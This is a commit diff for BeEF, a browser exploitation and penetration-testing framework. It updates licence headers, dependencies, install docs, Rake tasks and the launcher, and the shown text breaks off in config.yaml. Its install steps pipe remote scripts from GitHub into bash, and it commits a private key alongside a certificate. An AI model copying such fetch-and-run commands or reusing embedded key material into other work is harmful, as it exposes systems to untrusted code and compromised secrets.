Updated copyright dates

Updated version number to 0.4.6.0
Add support for Chrome 39
2014-12-30 07:44:58 +10:00 · 2014-12-30 07:30:58 +10:00 · 2014-12-26 13:02:12 +00:00 · 2014-12-26 12:42:17 +00:00 · 2014-12-23 15:38:02 +08:00 · 2014-12-22 00:47:56 +11:00
1293 changed files with 84406 additions and 12066 deletions
--- a/.gitignore
+++ b/.gitignore
@@ -1,2 +1,103 @@
+### BeEF ###
 beef.db
 test/msf-test
+custom-config.yaml
+.DS_Store
+.gitignore
+.rvmrc
+
+*.lock
+
+extensions/metasploit/msf-exploits.cache
+
+# The following lines were created by https://www.gitignore.io
+
+### Linux ###
+*~
+
+# KDE directory preferences
+.directory
+
+
+### vim ###
+[._]*.s[a-w][a-z]
+[._]s[a-w][a-z]
+*.un~
+Session.vim
+.netrwhist
+*~
+
+
+### Emacs ###
+# -*- mode: gitignore; -*-
+*~
+\#*\#
+/.emacs.desktop
+/.emacs.desktop.lock
+*.elc
+auto-save-list
+tramp
+.\#*
+
+# Org-mode
+.org-id-locations
+*_archive
+
+# flymake-mode
+*_flymake.*
+
+# eshell files
+/eshell/history
+/eshell/lastdir
+
+# elpa packages
+/elpa/
+
+# reftex files
+*.rel
+
+# AUCTeX auto folder
+/auto/
+
+# cask packages
+.cask/
+
+
+### nanoc ###
+# For projects using nanoc (http://nanoc.ws/)
+
+# Default location for output, needs to match output_dir's value found in config.yaml
+output/
+
+# Temporary file directory
+tmp/
+
+# Crash Log
+crash.log
+
+
+### Windows ###
+# Windows image file caches
+Thumbs.db
+ehthumbs.db
+
+# Folder config file
+Desktop.ini
+
+# Recycle Bin used on file shares
+$RECYCLE.BIN/
+
+# Windows Installer files
+*.cab
+*.msi
+*.msm
+*.msp
+
+# Windows shortcuts
+*.lnk
+
+
+### TortoiseGit ###
+# Project-level settings
+/.tgitconfig
+
--- a/56
+++ b/56
@@ -1,43 +1,49 @@
 # BeEF's Gemfile

 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

-# Gems only required on Windows, or with specific Windows issues
-if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
-  gem "win32console"
-  gem "eventmachine", "1.0.0.beta.4.1"
-else
-  gem "eventmachine", "0.12.10"
-end
-
+gem "eventmachine", "1.0.3"
 gem "thin"
+gem "sinatra", "1.4.2"
+gem "rack", "1.5.2"
+gem "em-websocket", "~> 0.3.6" # WebSocket support
+gem "uglifier", "~> 2.2.1"
+
+# Windows support
+if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
+  # make sure you install this gem following https://github.com/hiranpeiris/therubyracer_for_windows
+  gem "therubyracer", "~> 0.11.0beta1"
+  gem "execjs"
+  gem "win32console"
+elsif !RUBY_PLATFORM.downcase.include?("darwin")
+  gem "therubyracer", "0.11.3"
+  gem "execjs"
+end
+ 
+
 gem "ansi"
 gem "term-ansicolor", :require => "term/ansicolor"
 gem "dm-core"
 gem "json"
 gem "data_objects"
-gem "dm-sqlite-adapter"
+gem "dm-sqlite-adapter"  # SQLite support
+#gem dm-postgres-adapter # PostgreSQL support
+#gem dm-mysql-adapter    # MySQL support
 gem "parseconfig"
 gem "erubis"
 gem "dm-migrations"
-gem "msfrpc-client"
+gem "msfrpc-client"        # Metasploit Integration extension
+#gem "twitter", ">= 5.0.0" # Twitter Notifications extension
+gem "rubyzip", ">= 1.0.0"
+gem "rubydns", "0.7.0"     # DNS extension
+gem "geoip"                # geolocation support

+# For running unit tests
 if ENV['BEEF_TEST']
-# for running unit tests
  gem "test-unit"
  gem "test-unit-full"
  gem "curb"
@@ -48,6 +54,8 @@ if ENV['BEEF_TEST']
  # sudo apt-get install libxslt-dev libxml2-dev
  # sudo port install libxml2 libxslt
  gem "capybara"
+  # RESTful API tests/generic command module tests
+  gem "rest-client", "~> 1.6.7"
 end

 source "http://rubygems.org"
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,52 +0,0 @@
-GEM
-  remote: http://rubygems.org/
-  specs:
-    addressable (2.2.6)
-    ansi (1.4.1)
-    daemons (1.1.5)
-    data_objects (0.10.7)
-      addressable (~> 2.1)
-    dm-core (1.2.0)
-      addressable (~> 2.2.6)
-    dm-do-adapter (1.2.0)
-      data_objects (~> 0.10.6)
-      dm-core (~> 1.2.0)
-    dm-migrations (1.2.0)
-      dm-core (~> 1.2.0)
-    dm-sqlite-adapter (1.2.0)
-      dm-do-adapter (~> 1.2.0)
-      do_sqlite3 (~> 0.10.6)
-    do_sqlite3 (0.10.7)
-      data_objects (= 0.10.7)
-    erubis (2.7.0)
-    eventmachine (0.12.10)
-    json (1.6.4)
-    librex (0.0.52)
-    msfrpc-client (1.0.1)
-      librex (>= 0.0.32)
-      msgpack (>= 0.4.5)
-    msgpack (0.4.6)
-    parseconfig (0.5.2)
-    rack (1.4.0)
-    term-ansicolor (1.0.7)
-    thin (1.3.1)
-      daemons (>= 1.0.9)
-      eventmachine (>= 0.12.6)
-      rack (>= 1.0.0)
-
-PLATFORMS
-  ruby
-
-DEPENDENCIES
-  ansi
-  data_objects
-  dm-core
-  dm-migrations
-  dm-sqlite-adapter
-  erubis
-  eventmachine (= 0.12.10)
-  json
-  msfrpc-client
-  parseconfig
-  term-ansicolor
-  thin
--- a/INSTALL.txt
+++ b/INSTALL.txt
@@ -0,0 +1,74 @@
+===============================================================================
+   
+    Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+
+===============================================================================
+
+Installation
+------------
+
+   1. Prerequisites (platform independent)
+   2. Prerequisites (Windows)
+   3. Prerequisites (Linux)
+   4. Prerequisites (Mac OSX)
+   5. Install instructions
+   6. Run instructions
+
+
+
+   1. Prerequisites (platform independent)
+
+      BeEF requires ruby 1.9 and the "bundler" gem. Bundler can be installed by:
+
+      gem install bundler
+
+      
+   2. Prerequisites (Windows)
+
+      !!! This must be done PRIOR to running the bundle install command !!!
+      
+      Windows requires the sqlite.dll.  Simply grab the zip file below and extract it to your Ruby bin directory:
+
+	  http://www.sqlite.org/sqlitedll-3_7_0_1.zip
+
+	  Other than that, you also need TheRubyRacer. As it's painful to install it on Windows, you can download 2 pre-compiled V8 DLLs and 2 gems from https://github.com/hiranpeiris/therubyracer_for_windows.
+
+   3. Prerequisites (Linux)
+
+      !!! This must be done PRIOR to running the bundle install command !!!
+      
+      On linux you will need to find the packages specific to your distribution for sqlite.  An example for Ubuntu systems is:
+
+      3.0. sudo apt-get install libsqlite3-dev sqlite3 sqlite3-doc
+      3.1. install rvm from rvm.beginrescueend.com, this takes care of the various incompatible and conflicting ruby packages that are required
+      3.2. rvm install 1.9.3-p484
+      3.3. rvm use 1.9.3
+	  
+   4. Prerequisites (Mac OSX)
+   
+      - XCode: provides the sqlite support BeEF needs
+      
+      - Ruby 1.9
+      	To install RVM and Ruby 1.9.3 on Mac OS:
+      	$ bash -s stable < <(curl -Ls https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile
+      	$ rvm install 1.9.3-p484
+		$ rvm use 1.9.3
+      
+
+   5. Install instructions
+   
+      Obtain application code either by downloading an archive from https://github.com/beefproject/beef/archive/master.zip or cloning the GIT repo https://github.com/beefproject/beef.git
+
+	  Enter into the newly created BeEF directory, and type:
+
+	  bundle install
+
+      Bundler installs all the pre-requisite gems.
+
+   6. Run instructions
+
+      Simply run:
+
+      ./beef -x
--- a/134
+++ b/134
@@ -1,74 +1,60 @@
-
-   Copyright 2012 Wade Alcorn wade@bindshell.net
-
-   Licensed under the Apache License, Version 2.0 (the "License");
-   you may not use this file except in compliance with the License.
-   You may obtain a copy of the License at
-
-       http://www.apache.org/licenses/LICENSE-2.0
-
-   Unless required by applicable law or agreed to in writing, software
-   distributed under the License is distributed on an "AS IS" BASIS,
-   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-   See the License for the specific language governing permissions and
-   limitations under the License.
-
-Most of the contents of this file will eventually be added to /install.rb. In the meantime tips, hints and guides for installing BeEF should be kept here.
-
-=============================================
-
-   1. Prerequisites (platform independent)
-   2. Prerequisites (Windows)
-   3. Prerequisites (Linux)
-   4. Prerequisites (Mac OSX)
-   5. Install instructions
-   6. Run instructions
-
-
-
-   1. Prerequisites (platform independent)
-
-      BeEF requires ruby 1.9 and the "bundler" gem. Bundler can be installed by:
-
-      gem install bundler
-
-      
-   2. Prerequisites (Windows)
-      
-      Windows requires the sqlite.dll.  Simply grab the zip file below and extract it to your Ruby bin directory:
-
-	  http://www.sqlite.org/sqlitedll-3_7_0_1.zip
-      
-
-   3. Prerequisites (Linux)
-
-      !!! This must be done PRIOR to running the bundle install command !!!
-      
-      On linux you will need to find the packages specific to your distribution for sqlite.  An example for Ubuntu systems is:
-
-      3.0. sudo apt-get install libsqlite3-dev sqlite3 sqlite3-doc
-      3.1. install rvm from rvm.beginrescueend.com, this takes care of the various incompatable and conflicting ruby packages that are required
-      3.2. rvm install 1.9.2
-      3.3. rvm use 1.9.2
-	  
-   4. Prerequisites (Mac OSX)
-   
-      Make sure you have XCode installed - which provided the sqlite support BeEF needs
-      Sqlite support is native in MacOS 10.6+
-      
-
-   5. Install instructions
-   
-      Obtain application code either by downloading an archive from https://github.com/beefproject/beef/zipball/master or cloning the GIT repo git@github.com:beefproject/beef.git
-
-	  Navigate to the ruby source directory and run:
-
-	  bundle install
-
-      Bundler installs all the pre-requisite gems.
-
-   6. Run instructions
-
-      Simply run:
-
-      ./beef
+===============================================================================
+   
+    Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+
+===============================================================================
+
+What is BeEF?
+-------------
+
+BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
+
+Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
+
+
+Get Involved 
+------------
+
+You can get in touch with the BeEF team. Just check out the following: 
+
+
+Please, send us pull requests!
+
+Web: http://beefproject.com/
+
+Mail: beef-subscribe@bindshell.net
+
+IRC: ircs://irc.freenode.net/beefproject
+
+Twitter: @beefproject
+
+
+Requirements
+------------
+
+* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
+* [Ruby](http://rubylang.org) 1.9.2 or higher
+* [SQLite](http://sqlite.org) 3.x
+* The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile
+
+
+Quick Start
+----------- 
+
+__The following is for the impatient.__ 
+
+For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
+We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation
+
+   $ bash -s stable < <(curl -Ls https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
+
+
+Usage 
+----- 
+
+To get started, simply execute beef and follow the instructions:
+
+   $ ./beef
+
--- a/README.mkd
+++ b/README.mkd
@@ -0,0 +1,63 @@
+===============================================================================
+   
+    Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+
+===============================================================================
+
+What is BeEF?
+-------------
+
+__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser.
+
+Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
+
+
+Get Involved 
+------------
+
+You can get in touch with the BeEF team. Just check out the following: 
+
+
+__Please, send us pull requests!__
+
+__Web:__ http://beefproject.com/
+
+__Mail:__ beef-subscribe@bindshell.net
+
+__IRC:__ ircs://irc.freenode.net/beefproject
+
+__Twitter:__ @beefproject
+
+
+Requirements
+------------
+
+* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
+* [Ruby](http://rubylang.org) 1.9.2 or higher
+* [SQLite](http://sqlite.org) 3.x
+* The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile
+
+
+Quick Start
+----------- 
+
+__The following is for the impatient.__ 
+
+For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
+We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation
+
+       $ curl -L https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
+
+
+Usage 
+----- 
+
+To get started, simply execute beef and follow the instructions: 
+
+       $ ./beef
+
+On windows use
+
+      $ ruby beef
--- a/103
+++ b/103
@@ -1,31 +1,21 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 task :default => ["quick"]

 desc "Run quick tests"
 task :quick do
-  Rake::Task['unit'].invoke                 # run unit tests
+  Rake::Task['unit'].invoke # run unit tests
 end

 desc "Run all tests"
 task :all do
-  Rake::Task['integration'].invoke          # run integration tests
-  Rake::Task['unit'].invoke                 # run unit tests
-  Rake::Task['msf'].invoke                  # run msf tests
+  Rake::Task['integration'].invoke # run integration tests
+  Rake::Task['unit'].invoke # run unit tests
+  Rake::Task['msf'].invoke # run msf tests
 end

 desc "Run automated tests (for Jenkins)"
@@ -48,16 +38,16 @@ task :unit => ["install"] do
 end

 desc "Run MSF unit tests"
-task :msf => ["install", "msf_install"]  do
+task :msf => ["install", "msf_install"] do
  Rake::Task['msf_update'].invoke
  Rake::Task['msf_start'].invoke
  sh "cd test/thirdparty/msf/unit/;ruby -W0 ts_metasploit.rb"
  Rake::Task['msf_stop'].invoke
 end

-task :install do
-  sh "export BEEF_TEST=true;bundle install > /dev/null"
-end
+#task :install do
+#  sh "export BEEF_TEST=true"
+#end

 ################################
 # X11 set up
@@ -67,7 +57,7 @@ end
 task :xserver_start do
  printf "Starting X11 Server (wait 10 seconds)..."
  @xserver_process_id = IO.popen("/usr/bin/Xvfb :0 -screen 0 1024x768x24 2> /dev/null", "w+")
-  delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
+  delays = [2, 2, 1, 1, 1, 0.5, 0.5, 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
  delays.each do |i| # delay for 10 seconds
    printf '.'
    sleep (i) # increase the . display rate
@@ -86,10 +76,10 @@ end
@beef_process_id = nil;

 task :beef_start => 'beef' do
-  printf "Starting BeEF (wait 10 seconds)..."
+  printf "Starting BeEF (wait a few seconds)..."
  @beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
-  delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
-  delays.each do |i| # delay for 10 seconds
+  delays = [10, 10, 5, 5, 4, 4, 3, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1]
+  delays.each do |i| # delay for a few seconds
    printf '.'
    sleep (i)
  end
@@ -109,7 +99,7 @@ end
 task :msf_start => '/tmp/msf-test/msfconsole' do
  printf "Starting MSF (wait 45 seconds)..."
  @msf_process_id = IO.popen("/tmp/msf-test/msfconsole -r test/thirdparty/msf/unit/BeEF.rc 2> /dev/null", "w+")
-  delays = [10, 7, 6, 5, 4, 3, 2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
+  delays = [10, 7, 6, 5, 4, 3, 2, 2, 1, 1, 1, 0.5, 0.5, 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
  delays.each do |i| # delay for 45 seconds
    printf '.'
    sleep (i) # increase the . display rate
@@ -126,7 +116,7 @@ task :msf_install => '/tmp/msf-test/msfconsole' do
  # Handled by the 'test/msf-test/msfconsole' task.
 end

-task :msf_update  => '/tmp/msf-test/msfconsole' do
+task :msf_update => '/tmp/msf-test/msfconsole' do
  sh "cd /tmp/msf-test;git pull"
 end

@@ -135,3 +125,62 @@ file '/tmp/msf-test/msfconsole' do
  sh "cd test;git clone https://github.com/rapid7/metasploit-framework.git /tmp/msf-test"
 end

+
+################################
+# Create Mac DMG File
+
+task :dmg do
+  puts "\nCreating Working Directory\n";
+  sh "mkdir dmg";
+  sh "mkdir dmg/BeEF";
+  sh "rsync * dmg/BeEF --exclude=dmg -r";
+  sh "ln -s /Applications dmg/";
+  puts "\nCreating DMG File\n"
+  sh "hdiutil create ./BeEF.dmg -srcfolder dmg -volname BeEF -ov";
+  puts "\nCleaning Up\n"
+  sh "rm -r dmg";
+  puts "\nBeEF.dmg created\n"
+end
+
+
+################################
+# Create CDE Package
+# This will download and make the CDE Executable and 
+# gnereate a CDE Package in cde-package
+
+task :cde do
+  puts "\nCloning and Making CDE...";
+  sh "git clone git://github.com/pgbovine/CDE.git";
+  Dir.chdir "CDE";
+  sh "make";
+  Dir.chdir "..";
+  puts "\nCreating CDE Package...\n";
+  sh "bundle install"
+  Rake::Task['cde_beef_start'].invoke
+  Rake::Task['beef_stop'].invoke
+  puts "\nCleaning Up...\n";
+  sleep (2);
+  sh "rm -rf CDE";
+  puts "\nCDE Package Created...\n";
+end
+
+################################
+# CDE/BeEF environment set up
+
+@beef_process_id = nil;
+
+task :cde_beef_start => 'beef' do
+  printf "Starting CDE BeEF (wait 10 seconds)..."
+  @beef_process_id = IO.popen("./CDE/cde ruby beef -x 2> /dev/null", "w+")
+  delays = [2, 2, 1, 1, 1, 0.5, 0.5, 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
+  delays.each do |i| # delay for 10 seconds
+    printf '.'
+    sleep (i)
+  end
+  puts '.'
+end
+
+
+################################
+
+
--- a/18
+++ b/18
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

-0.4.3.1-alpha
+0.4.6.0-alpha
--- a/80
+++ b/80
@@ -1,19 +1,9 @@
 #!/usr/bin/env ruby

 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 # stop deprecation warning from being displayed
@@ -24,7 +14,7 @@ if  RUBY_VERSION < '1.9'
  puts "\n"
  puts "Ruby version " + RUBY_VERSION + " is no longer supported. Please upgrade 1.9 or later."
  puts "OSX:"
-  puts "sudo port install ruby19 +nosuffix"
+  puts "See Readme"
  puts "\n"
  exit
 end
@@ -41,15 +31,40 @@ end
 # @note Require core loader's
 require 'core/loader'

-# @note Starts configuration system
-config = BeEF::Core::Configuration.instance
+# @note Initialize the Configuration object. Eventually loads a different config.yaml if -c flag was passed.
+if BeEF::Core::Console::CommandLine.parse[:ext_config].empty?
+  config = BeEF::Core::Configuration.new("#{$root_dir}/config.yaml")
+else
+  config = BeEF::Core::Configuration.new("#{$root_dir}/#{BeEF::Core::Console::CommandLine.parse[:ext_config]}")
+end
+
+# @note After the BeEF core is loaded, bootstrap the rest of the framework internals
+require 'core/bootstrap'

 # @note Loads enabled extensions
 BeEF::Extensions.load

+# @note Prints the BeEF ascii art if the -a flag was passed
+if BeEF::Core::Console::CommandLine.parse[:ascii_art] == true
+  BeEF::Core::Console::Banners.print_ascii_art
+end
+
+# @note Check if port and WebSocket port need to be updated from command line parameters
+unless BeEF::Core::Console::CommandLine.parse[:port].empty?
+  config.set('beef.http.port', BeEF::Core::Console::CommandLine.parse[:port])
+end
+
+unless BeEF::Core::Console::CommandLine.parse[:ws_port].empty?
+  config.set('beef.http.websocket.port', BeEF::Core::Console::CommandLine.parse[:ws_port])
+end
+
+# @note Check if interactive was specified from the command line, therefore override the extension to enable
+if BeEF::Core::Console::CommandLine.parse[:interactive] == true
+  config.set('beef.extension.console.shell.enable',true)
+end
+
 # @note Prints BeEF welcome message
-#BeEF::Extension::Console::Banners.print_ascii_art
-BeEF::Extension::Console::Banners.print_welcome_msg
+BeEF::Core::Console::Banners.print_welcome_msg

 # @note Loads enabled modules
 BeEF::Modules.load
@@ -61,10 +76,11 @@ Socket.do_not_reverse_lookup = true
 case config.get("beef.database.driver")
  when "sqlite"
    DataMapper.setup(:default, "sqlite3://#{$root_dir}/#{config.get("beef.database.db_file")}")
-  when "mysql","postgres"
+  when "mysql", "postgres"
    DataMapper.setup(:default,
                     :adapter => config.get("beef.database.driver"),
                     :host => config.get("beef.database.db_host"),
+                     :port => config.get("beef.database.db_port"),
                     :username => config.get("beef.database.db_user"),
                     :password => config.get("beef.database.db_passwd"),
                     :database => config.get("beef.database.db_name"),
@@ -75,8 +91,7 @@ case config.get("beef.database.driver")
 end

 # @note Resets the database if the -x flag was passed
-# @todo Change reference from Extension::Console to Core::Console once the console extension is merged with the core
-if BeEF::Extension::Console.resetdb?
+if BeEF::Core::Console::CommandLine.parse[:resetdb]
  print_info 'Resetting the database for BeEF.'
  DataMapper.auto_migrate!
 else
@@ -94,10 +109,23 @@ http_hook_server = BeEF::Core::Server.instance
 http_hook_server.prepare

 # @note Prints information back to the user before running the server
-BeEF::Extension::Console::Banners.print_loaded_extensions
-BeEF::Extension::Console::Banners.print_loaded_modules
-BeEF::Extension::Console::Banners.print_network_interfaces_count
-BeEF::Extension::Console::Banners.print_network_interfaces_routes
+BeEF::Core::Console::Banners.print_loaded_extensions
+BeEF::Core::Console::Banners.print_loaded_modules
+BeEF::Core::Console::Banners.print_network_interfaces_count
+BeEF::Core::Console::Banners.print_network_interfaces_routes
+
+#@note Prints the API key needed to use the RESTful API
+print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}"
+
+#@note Starts the WebSocket server
+if config.get("beef.http.websocket.enable")
+  BeEF::Core::Websocket::Websocket.instance
+  print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
+  if config.get("beef.http.websocket.secure")
+    print_info "Starting WebSocketSecure server on port [#{config.get("beef.http.websocket.secure_port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
+  end
+end
+

 # @note Call the API method 'pre_http_start'
 BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server)
@@ -109,7 +137,7 @@ if config.get("beef.extension.console.shell.enable") == true
  begin
    FileUtils.mkdir_p(File.expand_path(config.get("beef.extension.console.shell.historyfolder")))
    BeEF::Extension::Console::Shell.new(BeEF::Extension::Console::Shell::DefaultPrompt,
-                                        BeEF::Extension::Console::Shell::DefaultPromptChar,{'config' => config, 'http_hook_server' => http_hook_server}).run
+                                        BeEF::Extension::Console::Shell::DefaultPromptChar, {'config' => config, 'http_hook_server' => http_hook_server}).run
  rescue Interrupt
  end
 else
--- a/beef_cert.pem
+++ b/beef_cert.pem
@@ -0,0 +1,19 @@
+-----BEGIN CERTIFICATE-----
+MIIDDjCCAnegAwIBAgIJAKNYRH/AaB3DMA0GCSqGSIb3DQEBBQUAMIGfMQswCQYD
+VQQGEwJBVTEUMBIGA1UECAwLQm92aW5lIExhbmQxDTALBgNVBAcMBEJlRUYxDTAL
+BgNVBAoMBEJlRUYxDTALBgNVBAsMBEJlRUYxJzAlBgNVBAMMHkJyb3dzZXIgRXhw
+bG9pdGF0aW9uIEZyYW1ld29yazEkMCIGCSqGSIb3DQEJARYVQmVFRkBkb250d3Jp
+dGVtZS5CZUVGMB4XDTEyMDgwNjEzMDUzOFoXDTEzMDgwNjEzMDUzOFowgZ8xCzAJ
+BgNVBAYTAkFVMRQwEgYDVQQIDAtCb3ZpbmUgTGFuZDENMAsGA1UEBwwEQmVFRjEN
+MAsGA1UECgwEQmVFRjENMAsGA1UECwwEQmVFRjEnMCUGA1UEAwweQnJvd3NlciBF
+eHBsb2l0YXRpb24gRnJhbWV3b3JrMSQwIgYJKoZIhvcNAQkBFhVCZUVGQGRvbnR3
+cml0ZW1lLkJlRUYwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALCxzu+rOTt2
+VBM5X5KL2xpDvMJ7wT0BSVgbkEF9Pd3+h3NbB/LST0n+Mwtnk4wLzmjmNiob3EdP
+0l+pKgIZYT8yHMvI3pwp0hmpE3D2bALyiQTOTjF0IhUeIYa9ZhEyeN+PgA6+Hs0Z
+F/0y0El2XjkPF42Dnmp9mLTSfScv1v4xAgMBAAGjUDBOMB0GA1UdDgQWBBTaXny0
+kTye7CAr0ronsg0ob63+kTAfBgNVHSMEGDAWgBTaXny0kTye7CAr0ronsg0ob63+
+kTAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBABTy5s/XRd6iBwxOgV6N
+B+cTRgmgHciujbI+0p4TkOkHvQPhhcD3207ndWWwv+Mc2XeQcXNaOfYUDkeCs64N
+JffqThykYOdagvCu1Gecw9BEKeijS9MAuNvtvP7fcUNUql+VeTFbxMBPGDhusafz
+GkY0IBg9+j6XX4JwEXxCGt0a
+-----END CERTIFICATE-----
--- a/beef_key.pem
+++ b/beef_key.pem
@@ -0,0 +1,16 @@
+-----BEGIN PRIVATE KEY-----
+MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBALCxzu+rOTt2VBM5
+X5KL2xpDvMJ7wT0BSVgbkEF9Pd3+h3NbB/LST0n+Mwtnk4wLzmjmNiob3EdP0l+p
+KgIZYT8yHMvI3pwp0hmpE3D2bALyiQTOTjF0IhUeIYa9ZhEyeN+PgA6+Hs0ZF/0y
+0El2XjkPF42Dnmp9mLTSfScv1v4xAgMBAAECgYAKpDrNTmedACxiGAN8hPXGKCw3
+HlLuBKTRLJ/Mgel29DxeIy5gXnAuCaQzXKKTPabJxIugj5r9pH4MCtkf1T15Aib6
+4MFdx4UegllMUo7eUiuCtSmK9s0wEtJjShujBl4qQ10ZtWUh4Vd/clS88IjM/iPI
+5Ocoph5PUgFt/tX7DQJBAOkGptgdri39bRiSGaR/Si6YYpmMUFoQt+s2id8yH9QS
+26o8cHZKCahSiWLNi4rSzEJIOpXnP3n+Dcq2JttDWGcCQQDCHWgWSpdnX8uqp/Qo
+yp0RZJwyBFoba4bWhzoQJj+39P0+4FBaMlZyLHZ7nd4z0JiE5S3qA9xi8zjQVrrI
+rTWnAkEAmpPxBZfavWNJhW0VWYue1/36GkV73+MLPhq1pruHZZUE5o6lQ7KlaWUn
+AcW79WEUYjursVjvQKuI1pmyeOzZrQJBAIGQHSxbxyjBgPA8QDSF4EZ+r96Wlwoc
+QBiqk6+5x+fiBrJUCG3bkWWNldu2qFxPS63QRlAfGZeWHgK5ENzm95sCQQCe81hU
+WaVM9bmt0ZvfhfQXfgvf3xKNUFemd4skTMUDgNCH1OFULB/Mz16kJDdy0q0qUS88
+yBgay+U9QuoEO425
+-----END PRIVATE KEY-----
--- a/config.yaml
+++ b/config.yaml
@@ -1,70 +1,161 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
